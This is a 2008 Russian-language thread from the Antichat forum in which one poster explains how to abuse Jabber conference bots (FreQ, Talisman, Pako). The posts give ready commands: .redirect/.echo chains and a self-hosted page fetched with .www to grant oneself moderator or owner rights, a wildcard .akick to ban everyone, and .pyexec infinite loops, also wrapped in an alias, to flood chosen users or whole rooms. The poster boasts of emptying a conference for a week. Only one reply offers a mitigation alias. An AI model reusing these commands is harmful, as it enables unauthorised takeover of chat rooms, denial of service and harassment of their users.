ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Дыра в jabber
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Дыра в jabber
  #1  
Старый 26.08.2008, 05:08
Аватар для Rejjin
Rejjin
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634

Репутация: 97
По умолчанию Дыра в jabber
Решил поведать вам о дыре в jabber. Она основана на работе бота. Мы даем команду боту (он должен быть FreQ, ибо только у него команда .redirect), бот в свою очередь пересылает команду второму боту (который может быть любым). Сама суть в том, что для того чтобы дать команду боту например для бана, вы должны иметь определенный уровень доступа. Обычно этот уровень доступа имеет админ. Но тут то и открывается наша фишка FreQ тоже админ, и имеет достаточно прав для подачи команды второму боту. В общем команда выглядит так - .redirect Talisman .echo модератор Rejjin
.redirect == передать ответ бота другому участнику в приват. Talisman == второй бот у которого команда для модераторства "модератор" .echo == передать в первовведенном виде. Rejjin == ник который станет модератором.
Итак, команду можно написать FreQ в приват, что вам помогает сделать себя модератором, даже если вас сунули в визиторы.
З.ы. .commands .redirect Rejjin .disco conference.jabber.ru;.redirect Rejjin .disco conference.jabber.ru;.redirect Rejjin .disco conference.jabber.ru;.......и т.д. эта команда будет некуёво флудить любого в конфе, опять же даже если вы сидите в визиторах.
 
Ответить с цитированием

  #2  
Старый 26.08.2008, 05:11
Аватар для Rejjin
Rejjin
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634

Репутация: 97
По умолчанию
Кстати мне очень нравиться ставить акик или абан на все ники )) индусы неделю с ума сходили у них вся конфа опустела. Команда .redirect FreQ .echo .akick nick exp .*@.*
 
Ответить с цитированием

  #3  
Старый 27.08.2008, 04:41
Аватар для Rejjin
Rejjin
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634

Репутация: 97
По умолчанию
В общем я вспомнил еще одну фичу. Если на команду .echo повысили уровень доступа (на .redirect нельзя, останется только эту команду вырезать из кода бота), то можно ее заменить .www (получить страничку в чат). Предварительно создаем страничку, на которой будет находиться команда, например для Pako команда делающая вас модератором - "!muc moderator Rejjin". Больше на этой страничке ничего размещать нельзя!!! Например представим что наша страничка имеет адресс - http://www.pako-komand.ru После этого идем в приват FreQ и пишем - ".redirect Pako .www http://www.pako-komand.ru" боту Pako в приват передастся ответ команды, тоесть "!muc moderator Rejjin". Бот ее выполнит и вуаля вы теперь модератор. Опятьже если боты оунеры, то себя имеет смысл делать оунером а не модером.
 
Ответить с цитированием

  #4  
Старый 28.08.2008, 00:45
Аватар для Rejjin
Rejjin
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634

Репутация: 97
По умолчанию
Еще несколько секретов:
.pyexec while 1 : bot.muc.msg('chat', 'Адресс конфыконфы/Ник, кого флудим', 'Текст флуда')
В адрессе указать полностью.
Ник! А не жид.
Текст - любой.
Например вы сидите в конфе "Antichat", хотите зафлудить в приват "Rejjin" (Rejjin - не трогать!!!), текст флуда - "Antichat - rulezzzz". Тогда команда должна выглядеть так:
.pyexec while 1 : bot.muc.msg('chat', 'Antichat@conference.jabber.ru/Rejjin', 'Antichat - rulezzzz')
На флуд можно добавить алиас - это удобно. .alias_add access:9:9@.флудить=.pyexec while 1 : bot.muc.msg('chat', 'Antichat@conference.jabber.ru/%*', 'Antichat - rulezzzz')
Теперь Админы смогут писать .флуд <Ник>. Бот сам начнет флудить указанный ник.
Аналогично с флудом в чат. Можно привести бота в конфу и флудить всех. С командой действовать аналогично, но алиас не добовлять.
.pyexec while 1 : bot.muc.msg('groupchat', 'Antichat@conference.jabber.ru', 'Antichat - rulezzz')
З.ы. Эсли кто не понел - то эта команда для админа бота. Либо для оунера конфы. Ну если в конфе сидят два бота оунера - то вы себя можете сделать оунером, потом эту команду юзать.
 
Ответить с цитированием

  #5  
Старый 28.08.2008, 01:37
Аватар для Cheech
Cheech
Banned
Регистрация: 27.08.2008
Сообщений: 5
Провел на форуме:
14240

Репутация: 4
По умолчанию
жабир опасносте
 
Ответить с цитированием

  #6  
Старый 28.08.2008, 06:42
Аватар для Rejjin
Rejjin
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634

Репутация: 97
По умолчанию
Да нет, не в опасности. Кто знает, тот поставит себе ".alias_add access:9:9@.redirect=.redirect %*". Через алиас на .redirect установиться уровень доступа 9 (смогут юзать минимум модеры)...
 
Ответить с цитированием

  #7  
Старый 30.08.2008, 15:39
Аватар для гейлордфакерЪ
гейлордфакерЪ
Постоянный
Регистрация: 28.09.2006
Сообщений: 724
Провел на форуме:
1251165

Репутация: 703


Отправить сообщение для гейлордфакерЪ с помощью ICQ
По умолчанию
впринципе неудивил .. мне давольно извесный баг
+5
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вперед в будущее! Переход с ICQ на Jabber os1r1s Авторские статьи 45 23.11.2008 11:06
Есть ли дыра на mpchat.com ? Maxim Чаты 7 13.12.2005 22:10
В Microsoft Outlook Express найдена опасная дыра DRON-ANARCHY Мировые новости 3 16.06.2005 23:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ